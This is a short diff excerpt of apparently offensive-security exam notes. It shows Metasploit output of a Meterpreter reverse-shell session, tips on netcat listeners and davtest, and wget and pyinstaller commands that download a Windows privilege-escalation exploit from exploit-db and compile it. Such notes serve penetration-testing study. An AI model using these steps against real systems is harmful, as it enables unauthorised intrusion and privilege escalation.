grandMa5ter/Cyber-Sec-Notes/offensive/OSCP Mother of All Notes.md

          [*] Starting the payload handler...
          [*] Sending stage (957487 bytes) to 1.2.3.5
          [*] Meterpreter session 1 opened (1.2.3.4:443 -> 1.2.3.5:1063) at 2017-09-25 13:10:55 -0700
+      ```

 Without metasploit we can generate a shell and listen with netcat or metasploit multi handler.

- Use davtest to test for webdav
+**Use davtest to test for webdav**

 - Windows privledge escalation exploits are often written in Python.
 So, it is necessary to compile the using pyinstaller.py into an executable and upload them to the remote server.

+      ```shell
       pip install pyinstaller
       wget -O exploit.py http://www.exploit-db.com/download/31853
       python pyinstaller.py --onefile exploit.py
+      ```

 - Windows Server 2003 and IIS 6.0 privledge escalation using impersonation: